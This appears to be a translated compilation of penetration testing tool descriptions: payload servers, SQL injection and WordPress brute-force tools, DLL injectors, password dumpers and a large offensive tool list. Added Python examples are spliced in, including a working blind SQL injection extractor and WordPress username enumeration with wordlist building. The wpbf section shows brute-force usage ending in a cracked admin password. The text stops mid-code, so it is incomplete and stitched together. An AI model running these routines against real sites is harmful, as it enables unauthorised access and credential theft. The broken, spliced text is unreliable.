White Hat Hacker Capital: Buôn Ma Thuột

Vietnam White Hat Hacker training program in Buôn Ma Thuột City, combined with tourism. Arrive as a newbie, leave as a WHITE HAT HACKER!

Hacking and Penetration Testing with Metasploit

Security365's training program on using the Metasploit Framework for penetration testing and hacking.

C50 Computer Forensics Materials

Study materials on digital evidence investigation (CHFI), compiled by Security365 for training at C50.

Students, Hacking and Information Security

A student hacking competition, with web attack challenges for students built on the Hackademic Challenge platform.

Attack and Defense with BackTrack / Kali Linux

A course on attack and defense with the hackers' professional toolkits BackTrack and Kali Linux, based on Offensive Security content.

Maligno - Penetration Testing Tool that Serves Metasploit Payloads


Maligno is an open source penetration testing tool that serves Metasploit payloads. It generates shellcode with msfvenom and delivers it over HTTP or HTTPS; the shellcode is AES-encrypted and Base64-encoded before transmission.

Changelog: Metasploit multi-host support, socks4a server support (metasploit), last resort redirection for invalid requests and hosts out of scope, automatic client code obfuscation, delayed client payload execution, automatic metasploit resource file generation. 

Features
  • Encrypted communications: Maligno is a web server that talks to its clients over HTTP or HTTPS. Communications are AES-encrypted and Base64-encoded on both HTTP and HTTPS, and the encryption and encoding parameters are configurable. Clients do NOT validate the server certificate by default, so HTTPS hides the staging traffic from casual inspection but does not protect it against an active interceptor on the path.
  • On-the-fly shellcode generation, per session: Maligno generates shellcode at start-up and caches it for later use. It serves the cached shellcode to every client that requests it during the session, keeping one cache per configured Metasploit payload. The cache is discarded when Maligno shuts down.
  • Multi-payload support: Maligno can be configured with several Metasploit payloads, and clients can request different payloads from the server. Payloads are referred to by an index passed as a GET parameter; the parameter name is also configurable.
  • Multi-server support: Maligno can run on the same machine as Metasploit or on a separate one. Clients connect to Maligno, and Maligno generates shellcode that points at a pre-configured Metasploit multi/handler.
  • SOCKS4a proxy support: Maligno helps you start a Metasploit auxiliary socks4a proxy, which can be used with payloads such as reverse_https_proxy. This lets you send all your traffic through your Maligno server in a multi-server environment.
  • Scope definition: Maligno lets you define single IP addresses or ranges, so that shellcode is served only to machines involved in your pentest. A wildcard accepts ANY address.
  • Last-resort redirection: Maligno redirects hosts that are out of scope, or that send invalid requests, to a configured URL.
  • Client code generator and pseudorandom obfuscator: Maligno ships a script that generates client code ready for use, based on your server configuration, and obfuscates it pseudorandomly.
  • Delayed client execution: Maligno clients use a basic random execution delay that attempts to outlast AV sandboxes.
  • Metasploit resource file generator: Maligno generates MSF resource files from your configuration, ready for use with msfconsole.
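Scope enforcement and last-resort redirection, as described in the two bullets above, written out as an added Python example. This is not Maligno's code: the configuration dictionary, the parameter name `p`, the payload count and the redirect URL are all assumptions made for the example.

```python
import ipaddress
from urllib.parse import parse_qs, urlparse

# Constructed configuration standing in for a Maligno server config (the real file format differs).
CONFIG = {
    "scope": ["10.0.0.5", "192.168.56.0/24"],   # single addresses and CIDR ranges; "*" accepts any client
    "payload_param": "p",                        # GET parameter that carries the payload index
    "payload_count": 2,                          # payloads are referred to by index 0 .. count-1
    "redirect_url": "https://www.example.com/",  # last-resort redirection target
}


def in_scope(client_ip, scope):
    """True if the client matches a single address or falls inside a range, or the scope is a wildcard."""
    if "*" in scope:
        return True
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return False  # unparsable peer address: treat as out of scope
    return any(addr in ipaddress.ip_network(entry, strict=False) for entry in scope)


def route_request(client_ip, request_url, config=CONFIG):
    """Decide what the server does with one request.

    Returns ("serve", index) for an in-scope client asking for a configured payload index,
    and ("redirect", url) for everything else: out-of-scope hosts, a missing or repeated
    payload parameter, a non-numeric index, or an index with no payload behind it.
    """
    redirect = ("redirect", config["redirect_url"])
    if not in_scope(client_ip, config["scope"]):
        return redirect
    values = parse_qs(urlparse(request_url).query).get(config["payload_param"], [])
    if len(values) != 1 or not values[0].isdigit():
        return redirect
    index = int(values[0])
    if index >= config["payload_count"]:
        return redirect
    return ("serve", index)
```

The effect of the check is that a scanner or responder who stumbles on the server gets the same redirect as any other host, so the staging URL reveals nothing on its own; conversely, a defender trying to reproduce what a client fetched has to replay the exact source address and query string to get anything other than the redirect.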

Dradis v2.9 - Information Sharing For Security Assessments

Dradis is an open source framework for effective information sharing, especially during security assessments. It is a tool built specifically to help with the penetration testing process. Penetration testing is about information:
  1. Information discovery
  2. Exploiting useful information
  3. Reporting the findings

But penetration testing is also about sharing the information you and your teammates gather. Failing to share it effectively means lost exploitation opportunities and duplicated effort.

Dradis is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead.

Features

  • Easy report generation.
  • Support for attachments.
  • Integration with existing systems and tools through server plugins.
  • Platform independent.

Traditional pentesting teams face several kinds of information-sharing challenges: different tools produce output in different formats, different testers capture evidence in different ways, different companies report differently, and so on.

If you do not use a tool to share information, every tester keeps their own notes file to track their findings. Each stores this file locally, or on a shared resource, but the information does not reach the rest of the team immediately.

If you want to know your teammate's latest findings, you have to go looking for their notes file. You can also just talk, but talking is not very effective when you need a specific cookie value or a SQL query for an injection attack.

It seems reasonable that some effort should go into improving the quality and efficiency of this process.


The Mole - Automatic SQL Injection Exploitation Tool

The Mole is an automatic SQL injection exploitation tool. Given only a vulnerable URL and a string that is known to appear in a valid response, it can detect the injection and exploit it, using either the UNION technique or a boolean-based (blind) technique.

Features

  • Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and columns names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Exploits SQL Injections through GET/POST/Cookie parameters.
  • Developed in python 3.
  • Exploits SQL Injections that return binary data.
  • Powerful command interpreter to simplify its usage.
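The boolean-based technique described above, as an added Python example (not The Mole's code). The vulnerable page, the SQLite database and the "valid string" (the needle) are constructed for the example; against a real target the oracle() function would issue HTTP requests instead of calling the page function directly.

```python
import sqlite3

# Constructed, deliberately vulnerable target: an in-memory SQLite database stands in for
# the web application's backend, and vulnerable_page() for its ?id= handler.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 'S3cr3t!');
    INSERT INTO users VALUES (2, 'guest', 'guest');
""")

NEEDLE = "Welcome back"  # the "valid string": it appears only when the query returns a row


def vulnerable_page(user_id: str) -> str:
    """Simulates a page that concatenates the id parameter straight into SQL (the bug under test)."""
    sql = "SELECT username FROM users WHERE id = " + user_id
    try:
        row = _conn.execute(sql).fetchone()
    except sqlite3.Error:
        return "<h1>Error</h1>"
    if row is None:
        return "<h1>No such user</h1>"
    return f"<h1>{NEEDLE}, {row[0]}</h1>"


def oracle(condition: str) -> bool:
    """One true/false answer: the needle survives only if the injected condition holds."""
    return NEEDLE in vulnerable_page(f"1 AND ({condition})")


def detect() -> bool:
    """The detection step: a true condition keeps the needle, a false one removes it."""
    return oracle("1=1") and not oracle("1=2")


def extract(subquery: str, max_len: int = 64) -> str:
    """Recover the scalar result of `subquery` one character at a time, binary-searching each position."""
    result = ""
    for i in range(1, max_len + 1):
        if not oracle(f"length(({subquery})) >= {i}"):
            break  # past the end of the value
        lo, hi = 32, 126  # printable ASCII; widen the range if the data may contain other bytes
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result
```

detect() costs two requests; extract() costs about seven per character (one length check plus a binary search over 32..126). That request volume is what makes the boolean technique slow compared with UNION, where the result is read straight out of the page, and it is also what makes it visible in web server logs.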

SmartSPLAT - Tool to troubleshoot Checkpoint firewall issues and perform management tasks


SmartSPLAT is a freeware tool for troubleshooting Check Point firewall issues and performing management tasks.

It periodically checks for updates and, when a new release is published, updates itself from the SmartSPLAT web site.

SmartSPLAT connects to your firewall over an SSH secure channel.
Critical commands such as cpstop, kill and reboot, deleting a license, and similar commands that can stop your firewall from functioning properly are colored red, protected by checkboxes, and ask for confirmation before running.

The project uses an SSH library based on the Poderosa project.

For file transfer, SmartSPLAT uses PuTTY's pscp.exe; for SCP to work, the /etc/scpusers file on the firewall must list the connecting user.

SmartSPLAT includes a script named preparescp that checks whether the user is present in /etc/scpusers and adds a line for it if not.


Smart Pentester - An SSH based Penetration Testing Framework



Smart Pentester is an SSH-based penetration testing framework. It provides a GUI for well-known tools such as nmap, hping, tcpdump, volatility and hydra.

The Smart Pentester Framework gives you a user interface for penetration testing, malware analysis, forensic analysis, cyber intelligence, advanced packet generation techniques and more.

Hexorbase - Multiple Database Management and Audit Tool


HexorBase is a database application for administering and auditing multiple database servers simultaneously from a central location. It can run SQL queries and brute-force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase can route its traffic through proxies, or through a Metasploit pivot, to reach servers that are not directly accessible because they sit inside internal subnets.

It works on Linux and Windows with the following installed:

  • python
  • python-qt4
  • cx_Oracle
  • python-mysqldb
  • python-psycopg2
  • python-pymssql
  • python-qscintilla2


To install, simply run the following command in a terminal after changing directory to the path where the downloaded package is:
root@host:~# dpkg -i hexorbase_1.0_all.deb


WebSiteSniffer v1.41 - Captures all Web site files downloaded by your Web browser while browsing the Internet



WebSiteSniffer is a packet sniffer tool that captures all Web site files downloaded by your Web browser while browsing the Internet, and stores them on your hard drive under the base folder that you choose. WebSiteSniffer allows you to choose which type of Web site files will be captured: HTML Files, Text Files, XML Files, CSS Files, Video/Audio Files, Images, Scripts, and Flash (.swf) files.

While capturing the Web site files, the main window of WebSiteSniffer displays general statistics about the downloaded files for every Web site / host name, including the total size of all files (compressed and uncompressed) and the total number of files of every file type (HTML, Text, Images, and so on).


HackPorts - Mac OS X Penetration Testing Framework and Tools

HackPorts was developed as a penetration testing framework, with accompanying tools and exploits, that runs natively on Mac platforms. HackPorts is a 'super-project' that leverages existing code porting efforts, so security professionals can use hundreds of penetration testing tools on Mac systems without needing virtual machines.

Tool List:
  • 0trace
  • 3proxy
  • Air – Automated Image Installer
  • Android APK Tool
  • Android SDK Framework
  • Apache Users
  • Autopsy
  • BLINDELEPHANT
  • BRAA
  • Bed
  • BeEF
  • Binwalk
  • Btdsd
  • CHKRootKit
  • CHNTPwd
  • Casefile – Maltego
  • Cewl
  • Cisc0wn
  • Cisco Scanner (ciscos)
  • Cisco Torch
  • Cisco global exploiter
  • Credump
  • Creepy
  • Crunch
  • Cupp
  • CutyCapt
  • DBD (Durandal’s Backdoor)
  • DDSquat
  • DD_Rescue
  • DHCPig
  • DNSChef
  • DNSMAP
  • DNSRECON
  • DNSTRACER
  • DNmap
  • DPScan
  • DarkStat
  • DavTest
  • DeD
  • DerogDom
  • DirBuster
  • Dozer (Formally Mercury)
  • Droidbox
  • Encryption Wizard
  • EvilGrade
  • ExifTool
  • Social-Engineer Toolkit (SET)
  • ExploitDB
  • FIERCE2
  • FTester
  • Fast-Track
  • Flasm
  • GoldenEye
  • Golismero
  • Grabber
  • Grendel-Scan
  • HIOC
  • HashTag
  • Hashcat-utils
  • Hexinject
  • IAXFlood
  • IDAPro-Free
  • Intersect
  • Inundator
  • JBoss-Autopwn
  • JD – Java Decompiler
  • JavaLOIC.jar
  • John
  • Johnny
  • Joomscan
  • Kautilya
  • Killerbee
  • Kismac2
  • Laudanum
  • Libhijack
  • Linux Exploit Suggester
  • Lynis
  • MagicTree
  • MaskGen
  • Metagoofil
  • Mork.pl
  • Multimac
  • Netdiscover
  • Netifera
  • Nikto
  • ONESIXYONE
  • OWASP Mantra
  • OllyDbg – Debugger
  • OpenVas
  • OphCrack
  • Padbuster
  • Passdb
  • Patator
  • PdfBook
  • PeachFuzz
  • Phrasen | Drescher
  • Powerfuzzer
  • Pyrit
  • RFIDIOt
  • RSMangler
  • Rebind
  • Rec-Studio
  • ReverseRaider
  • SCTPScan
  • SFUZZ
  • SIPARMYKNIFE
  • SMBExec
  • SMTP-USER-ENUM
  • SNMPCheck
  • SPAMHole
  • SQLLHF
  • SSLCaudit
  • SSLSniff
  • SSLStrip
  • SUCrack
  • Samdump
  • Sipcrack
  • Skipfish
  • Smali
  • Smartphone-Pentest-Framework
  • StatProcessor
  • TCPReplay
  • TLSSLed
  • TWOFI
  • TestDisk
  • TestSSL
  • Truecrack
  • UAtester
  • UBERHARVEST
  • Unicornscan
  • Uniscan
  • Vega
  • Vinetto
  • Volatility
  • W3af
  • WCE – Windows Credential Editor
  • WIFITap
  • WOL-E
  • WPScan
  • Waffit
  • Wapiti
  • Web Backdoor Compilation (wbc)
  • WebScarab – OWASP
  • Webshag
  • Webslayer
  • Whatweb
  • XSpy
  • acccheck
  • adsnmp
  • aircrack-ng
  • artemisa
  • asp-audit.pl ASP Auditor
  • automater
  • bbqsql
  • bluediving
  • bluelog
  • bluemaho
  • bluepot
  • blueranger
  • bt-attacks
  • burpsuite
  • c07-sip-r2.jar
  • cdpsnarf
  • cisco-auditing-tool
  • cmospwd
  • cms-explorer
  • copy-router-config
  • cymothoa
  • darkMySQLi
  • dbpwaudit
  • deBlaze
  • dedected
  • dex2jar
  • dirb
  • dns2tcpc
  • dnsenum
  • dotdotpwn
  • easy-creds
  • enumIAX
  • evtparse.pl Parse Event log (Win2000, XP, 2003)
  • fierce
  • fimap
  • findmyhash.py
  • getsids
  • giskismet
  • goofile
  • goohost
  • gooscan
  • hack library
  • hash_id.py – Hash Identifer
  • hashcat
  • hexorbase
  • htexploit
  • httprint
  • httsquash
  • iWar
  • impacket-examples
  • intercepter-ng
  • iodine
  • iphoneanalyzer
  • ipv6toolset
  • jigsaw
  • keimpx.py
  • lanmap2
  • lbd – load balancing detector
  • letdown
  • make-pdf-javascript.py
  • manglefizz
  • mdb-export
  • merge-router-config
  • miranda
  • mitmproxy
  • mopest-2.pl
  • netgear-telnetenable
  • nimbostratus
  • oat (Oracle Auditing Tool)
  • ocs (OCS Cisco Scanner)
  • oscanner
  • packetstorm
  • pdf-parser
  • pdfid.py
  • pdgmail
  • peePDF
  • phrasenoia
  • pipal
  • plecost
  • pompem
  • powersploit
  • pref – Parse contents of XP/Vista Prefetch files/directory
  • proxystrike
  • ptunnel
  • pwnat
  • pytbull
  • rcracki_mt
  • redfang – the bluetooth hunter
  • revealertoolkit
  • rtpflood
  • rtpinject
  • rtpinsertsound
  • rtpmixsound
  • samdump2
  • sapyto – SAP Penetration Testing Framework
  • sidguesser
  • sipp
  • sipscan
  • sipvicious
  • spooftooph
  • sqlbrute
  • sqldict
  • sqlmap
  • sqlninja
  • sqlscan
  • sqlsus
  • sslyze
  • swaks – Swiss Army Knife for SMTP
  • tftp brute force
  • thcsslcheck
  • theHarvester
  • thebackdoorfactory
  • tnscmd10g
  • trixd00r
  • u3-pwn
  • udp.pl – UDP Flood
  • udptunnel
  • unix-priv-check
  • untidy – XML Fuzzer
  • voiphoney
  • volafox
  • warvox
  • websecurify
  • websploit
  • weevely
  • wfuzz
  • xsser
  • yersinia
  • zaproxy – OWASP ZAP


Wireless Network Watcher - Show who is connected to your wireless network


Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.

For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.

You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.


Remote DLL - Simple & Free Tool to Inject or Remove DLL from Remote Process


RemoteDLL is a simple tool to inject a DLL into, or remove a DLL from, a remote process. It is based on the popular DLL injection technique.

It supports the following DLL injection methods:
  • CreateRemoteThread
  • NtCreateThreadEx [good for DLL injection across sessions on Vista/Windows 7]
  • QueueUserAPC [delayed injection: the DLL loads when a thread in the target next enters an alertable wait]
Removing (freeing) a DLL from a process is the unique feature of RemoteDLL. It lets you instantly remove a DLL from the target process completely.

Nowadays many malware and spyware programs use DLL injection to hide inside legitimate system processes. Once injected, such a DLL is normally only removed by killing the process itself.

In such situations, RemoteDLL can help you remove the malicious DLL from the target process easily.

The current version supports injecting DLLs into, and removing DLLs from, 64-bit processes, along with numerous improvements for Windows 8.


ArchAssault - Arch Linux ISO for Penetration Testers


The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-round Linux enthusiasts. We import the vast majority of the official upstream Arch Linux packages, unmodified from their upstream source.

While our Arch Linux base is largely untouched, there are times when we have to fork a package to better support our large selection of tools. All of our packages strive to follow Arch Linux standards, methods and philosophies.


wpbf - WordPress Brute Force

The script tries to log in to the WordPress dashboard through the login form using a mixture of enumerated usernames, a wordlist, and relevant keywords taken from the blog's content. If a single username is given, the script does not search for additional usernames.

When a username/password pair matches, it is logged and shown on standard output.

For faster results you can spawn threads, but BE CAREFUL not to flood or DoS the site. Default settings can be changed in the "config.py" and "logging.conf" files.

The wordlist must have one entry per line; a small wordlist (wordlist.txt) and plugin list (plugins.txt) are provided for testing purposes.

Features

  • Username enumeration and detection (TALSOFT-2011-0526, Author's archive page and content parsing)
  • Threads
  • Use keywords from blog's content in the wordlist
  • HTTP Proxy Support
  • Basic WordPress fingerprint (version and full path)
  • Advanced plugin fingerprinting (bruteforce, discovery and version/documentation)
  • Detection of Login LockDown plugin (this plugin makes the bruteforce useless)
  • Advanced logging using Python's logging library and logging configuration file

Usage

Basic

In this example, wpbf will do a bruteforce test using the default settings (you can change the default settings in config.py). It will enumerate usernames, find keywords and plugins, use the static+generated wordlist to bruteforce each user and try to guess remote path:
$ ./wpbf.py http://localhost/wordpress/
2012-02-26 14:26:18,793 - INFO - Target URL: http://localhost/wordpress/
2012-02-26 14:26:18,844 - INFO - Checking URL and username...
2012-02-26 14:26:18,845 - INFO - Enumerating users...
2012-02-26 14:26:52,027 - INFO - Usernames: admin, test, guest
2012-02-26 14:26:54,153 - INFO - 31 plugins will be tested
2012-02-26 14:26:55,311 - INFO - 215 passwords will be tested
2012-02-26 14:26:55,369 - INFO - Starting workers...
2012-02-26 14:26:56,685 - INFO - WordPress version: 3.0.1
2012-02-26 14:26:57,570 - INFO - WordPress path in server: /var/www/wordpress/
2012-02-26 14:27:08,624 - INFO - Plugin 'akismet' was found
2012-02-26 14:27:10,292 - INFO - Plugin 'akismet' version: 2.5.5 (more info @ http://localhost/wordpress/wp-content/plugins/akismet/readme.txt)
221 tasks left / 2.1 tasks per second / 1.76min left
199 tasks left / 2.2 tasks per second / 1.51min left
172 tasks left / 2.7 tasks per second / 1.06min left
21 tasks left / 1.6 tasks per second / 0.22min left
2012-02-26 14:57:23,245 - INFO - Password 'qawsed' found for username 'admin' on http://localhost/wordpress/wp-login.php

Username enumeration only

The '-eu' or '--enumerateusers' parameter will only do username enumeration and list the usernames found
$ ./wpbf.py -eu http://www.mysite.com/blog/

Aggressive

You can spawn more threads to speed up the bruteforce process. Be aware that using a lot of threads can cause hangs in the server or denial of service. For this example we will spawn 23 threads:
$ ./wpbf.py -t 23 http://www.mysite.com/blog/

Custom

Using username 'john', not using keywords from the blog content for the wordlist, and going through a local proxy:
$ ./wpbf.py --nokeywords -u john -p http://localhost:8008/ http://www.mysite.com/blog/
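Two of the building blocks listed under Features, username enumeration through the author archive and a wordlist built from the blog's own words, as an added Python example (not wpbf's code). The HTTP responses and the page content are constructed, not captured from a real site; the author archive exposing the user slug either in the redirect URL or in the page's author-<slug> body class is WordPress behaviour, while the regular expressions and thresholds are this example's own choices.

```python
import re
from collections import Counter
from html.parser import HTMLParser

# Constructed responses to /?author=1, /?author=2, /?author=3 (not captured from a real site):
# (status, Location header or None, body). A redirect exposes the slug in the URL; where the
# redirect is disabled, the author archive still carries an author-<slug> body class.
SAMPLE_AUTHOR_RESPONSES = [
    (301, "http://localhost/wordpress/author/admin/", ""),
    (200, None, '<html><body class="archive author author-jdoe author-2"><h1>Posts by jdoe</h1></body></html>'),
    (404, None, '<html><body class="error404">Not found</body></html>'),
]

# Constructed blog content used as a source of password candidates.
SAMPLE_PAGE = """<html><head><style>.hidden{display:none}</style></head><body>
<h1>Coffee Roasters</h1>
<p>Our coffee roasters in Buon Ma Thuot roast robusta coffee daily.
<script>var tracking = 'ignored';</script>Robusta coffee from Dak Lak.</p></body></html>"""


class _VisibleText(HTMLParser):
    """Collects the page's visible text, skipping <script> and <style> contents."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def usernames_from_author_archive(responses):
    """Collect user slugs from author-archive responses, in the order the author IDs were probed."""
    found = []
    for status, location, body in responses:
        slug = None
        if status in (301, 302) and location:
            m = re.search(r"/author/([A-Za-z0-9._-]+)/?", location)
            slug = m.group(1) if m else None
        if slug is None:
            # lazy match so the first author-<name> class wins; a leading letter skips author-<id>
            m = re.search(r'<body[^>]*class="[^"]*?\bauthor-([A-Za-z][A-Za-z0-9._-]*)', body)
            slug = m.group(1) if m else None
        if slug and slug not in found:
            found.append(slug)
    return found


def keywords_from_content(page_html, min_len=5, top=10):
    """Most frequent visible words of at least min_len characters, plus a capitalised variant of each."""
    parser = _VisibleText()
    parser.feed(page_html)
    words = re.findall(r"[A-Za-z][A-Za-z0-9]+", " ".join(parser.parts))
    counts = Counter(w.lower() for w in words if len(w) >= min_len)
    candidates = []
    for word, _ in counts.most_common(top):
        candidates.extend([word, word.capitalize()])
    return candidates
```

The enumeration side needs one request per author ID and no credentials, which is why it is the quieter half of the tool; the login attempts are what trip rate limiting and plugins like Login LockDown, so the candidate list should be kept short and tried with few threads.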


Automater v2.0 - URL/Domain, IP Address, and Md5 Hash OSINT Tool


Automater is a URL/domain, IP address and MD5 hash OSINT tool aimed at making the analysis process easier for intrusion analysts. Given a target (URL, IP or hash) or a file full of targets, Automater returns relevant results from sources such as IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault and VirusTotal.

*Automater is installed on HoneyDrive and Kali by default, but the bundled version is currently outdated.

Installation:
Automater comes in two flavors: a Python script that works on Linux or Windows, and an exe for Windows.

Windows:
The Windows client is currently in development. In the meantime the Python code works on Windows with a Python 2.7 install.

Linux:
As this is a Python script you need the correct version of Python, which for this script is Python 2.7. I used mostly standard libraries, but just in case you don't have them, here are the libraries that are required: httplib2, re, sys, argparse, urllib, urllib2.

With Python and the libraries out of the way, you can simply use git to clone the tekdefense code to your local machine.
git clone https://github.com/1aN0rmus/TekDefense-Automater.git

Usage:
Once installed the usage is pretty much the same across Windows, Linux, and Kali.
python Automater.py -h

or, if you chmod +x Automater.py, you can run

./Automater.py -h

usage: Automater.py [-h] [-o OUTPUT] [-w WEB] [-c CSV] [-d DELAY] [-s SOURCE]
                    [--p]
                    target

IP, URL, and Hash Passive Analysis tool

positional arguments:
  target                List one IP Addresses, URL or Hash to query or pass
                        the filename of a file containing IP Addresses, URL or
                        Hash to query each separated by a newline.

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        This option will output the results to a file.
  -w WEB, --web WEB     This option will output the results to an HTML file.
  -c CSV, --csv CSV     This option will output the results to a CSV file.
  -d DELAY, --delay DELAY
                        This will change the delay to the inputted seconds.
                        Default is 2.
  -s SOURCE, --source SOURCE
                        This option will only run the target against a
                        specific source engine to pull associated domains.
                        Options are defined in the name attribute of the site
                        element in the XML configuration file
  --p                   This option tells the program to post information to
                        sites that allow posting. By default the program will
                        NOT post to sites that require a post.
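The first thing a tool like Automater has to do with its positional argument is tell an IP address, a URL/domain and an MD5 hash apart and read a file of mixed targets; the -d delay then paces the requests. Here is that intake logic as an added Python example, not Automater's own code: the target file is constructed, the per-target lookup function is injected, and no real source is queried.

```python
import ipaddress
import re
import time

MD5_RE = re.compile(r"^[0-9a-fA-F]{32}$")
# One or more dot-separated labels of letters, digits and hyphens; enough to reject free text.
HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))+$")

# Constructed input file: one target per line, blanks and # comments allowed.
SAMPLE_TARGETS = """\
# constructed sample, not real indicators
8.8.8.8
http://www.example.com/malware.php
d41d8cd98f00b204e9800998ecf8427e
not a target
evil.example.net

2001:db8::1
"""


def classify_target(target):
    """Return 'hash', 'ip', 'url' or 'invalid' for one target string."""
    t = target.strip()
    if MD5_RE.match(t):
        return "hash"
    try:
        ipaddress.ip_address(t)
        return "ip"
    except ValueError:
        pass
    host = t.split("://", 1)[1] if "://" in t else t                  # drop the scheme
    host = host.split("/", 1)[0].split("@")[-1].split(":", 1)[0]     # keep only the host part
    return "url" if HOST_RE.match(host) else "invalid"


def load_targets(text):
    """Group the lines of a target file by type; unusable lines are kept under 'invalid' for review."""
    groups = {"hash": [], "ip": [], "url": [], "invalid": []}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        groups[classify_target(line)].append(line)
    return groups


def query_all(targets, lookup, delay=2.0):
    """Run lookup(target) for each target with a fixed pause between calls, like Automater's -d delay.

    `lookup` is any callable that queries one source; it is injected so the pacing can be tested offline.
    """
    results = []
    for i, target in enumerate(targets):
        if i and delay:
            time.sleep(delay)
        results.append((target, lookup(target)))
    return results
```

Keeping the invalid lines rather than silently dropping them matters in practice: a hash with a stray character or a defanged indicator such as hxxp://... would otherwise vanish from the report without anyone noticing.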


Windows Autologin Password Dumper & Manager v2.0


Windows Autologin Password is a free command-line tool to quickly dump and manage the Windows Automatic Logon password.

Automatic Logon is a convenience feature of Windows that logs you in to the system without entering the password every time. This tool lets you dump the current Autologon password and change the Autologon settings with a single command.
Here is the complete list of things you can do with it:

  • Dump the Windows Auto Logon user and password
  • Enable Windows Auto Logon
  • Specify your username and password for Windows Auto Logon
  • Disable Windows Auto Logon

Once you set the Auto Logon username and password, you have to restart; from then on you are logged in automatically.
It is a simple, easy-to-use tool, and being command-line based makes it well suited to automation.

Autologon keeps its settings under the Winlogon registry key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon: AutoAdminLogon, DefaultUserName and DefaultPassword), with the password either there in clear or in the DefaultPassword LSA secret. Either way, anyone with administrative access to the machine can recover it, which is exactly what this tool does, so an autologon account should never carry more privilege than a kiosk user needs.

'Windows Autologin Password' works on both 32-bit and 64-bit versions and has been tested successfully on all Windows platforms from Windows XP to the latest version, Windows 8.


Hooker - Automated Dynamic Analysis of Android Applications


Hooker is an open source project for dynamic analysis of Android applications. It provides various tools and applications that can be used to automatically intercept and modify any API calls made by a targeted application. It leverages the Android Substrate framework to intercept these calls and aggregates all their contextual information (parameters, return values, ...) in an Elasticsearch database. A set of Python scripts can be used to automate an analysis run in order to collect all API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:
  1. APK-instrumenter is an Android application that must be installed on the Android device (for instance, an emulator) before the analysis.
  2. hooker_xp is a Python tool that controls the Android device and triggers the installation and stimulation of an application on it.
  3. hooker_analysis is a Python script that collects the results stored in the Elasticsearch database.
  4. tools/APK-contactGenerator is an Android application that hooker_xp installs automatically on the Android device to inject fake contact information.
  5. tools/apk_retriever is a Python tool for downloading APKs from various public online Android markets.
  6. tools/emulatorCreator is a script that prepares an emulator.

Passive Spider - Information Gathering from Search Engine Tool

Passive Spider uses search engines (currently only Bing supported) to find interesting information about a target domain.

INSTALL
git clone https://github.com/RandomStorm/passive-spider.git
cd passive-spider
gem install bundler && bundle install
Place your search engine API keys in the api_keys.config file. Each search engine API has different usage limits and pricing, refer to them for this information. Do not share your keys.
Tested on Mac OS X with Ruby 1.9.3 & Ruby 2.1.2.

ARGUMENTS

--domain      || -d   The domain you would like to use as a target.
--pages       || -p   The number of pages you would like to hit from the search engine. Default: 10
--all         || -a   Do all of the spidering checks. This is the default check.
--allpages            Find all pages related to the domain, limited by the --pages option.
--allfiles            Find all file types related to the domain, limited to the ones configured.
--neighbours          Find other domains that are on the same IP address.
--urlkeywords         Find page URLs that have 'interesting' keywords in them.
--keywords            Find page content that has 'interesting' keywords in it.
--export      || -e   Request URLs through a proxy. Specify a proxy (type://ip:port) or use the default. Default: http://127.0.0.1:8080
--help        || -h   This output.

USAGE

- Run all checks against the given domain...
ruby pspider.rb -d www.example.com

- Run all checks against the admin subdomain...
ruby pspider.rb -d admin.example.com

- Run all checks against the given domain, limited to 50 search engine pages...
ruby pspider.rb -d www.example.com -p 50

- Run the IP Neighbour check against the given domain...
ruby pspider.rb -d www.example.com --neighbours


YASAT - Yet Another Stupid Audit Tool



YASAT (Yet Another Stupid Audit Tool) is a simple, stupid audit tool.
Its first goal is to be as simple as possible, with minimal binary dependencies (only sed, grep and cut).
Its second goal is to document each test with as much information as possible, including links to official documentation.
It runs many tests that check for security configuration issues and other good practice.
It checks the configuration of many pieces of software, such as:
  • Apache
  • Bind DNS
  • CUPS
  • PHP
  • kernel configuration
  • mysql
  • network configuration
  • openvpn
  • Packages update
  • samba
  • snmpd
  • squid
  • syslog
  • tomcat
  • user accounting
  • vsftpd
  • xinetd
YASAT is licensed under GPLv3
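One of YASAT's configuration checks, written out for php.ini as an added Python example. YASAT itself is shell script built on sed, grep and cut, and this is not its code: the php.ini fragment is constructed, the list of directives and acceptable values is this example's own, and the reference URL is the PHP manual's directive index. The pattern it shows is the one YASAT follows, a test that carries its own explanation and documentation link alongside the verdict.

```python
# Constructed php.ini fragment (not taken from a real host) with a mix of weak and acceptable values.
SAMPLE_PHP_INI = """
; constructed sample
[PHP]
expose_php = On
display_errors = On
allow_url_include = Off
allow_url_fopen = On ; trailing comment
"""

# Each check carries its own documentation, in the spirit of YASAT's per-test write-ups:
# (directive, acceptable values, why it matters, reference). The URL is the PHP manual's directive index.
PHP_DOC = "https://www.php.net/manual/en/ini.list.php"
PHP_CHECKS = [
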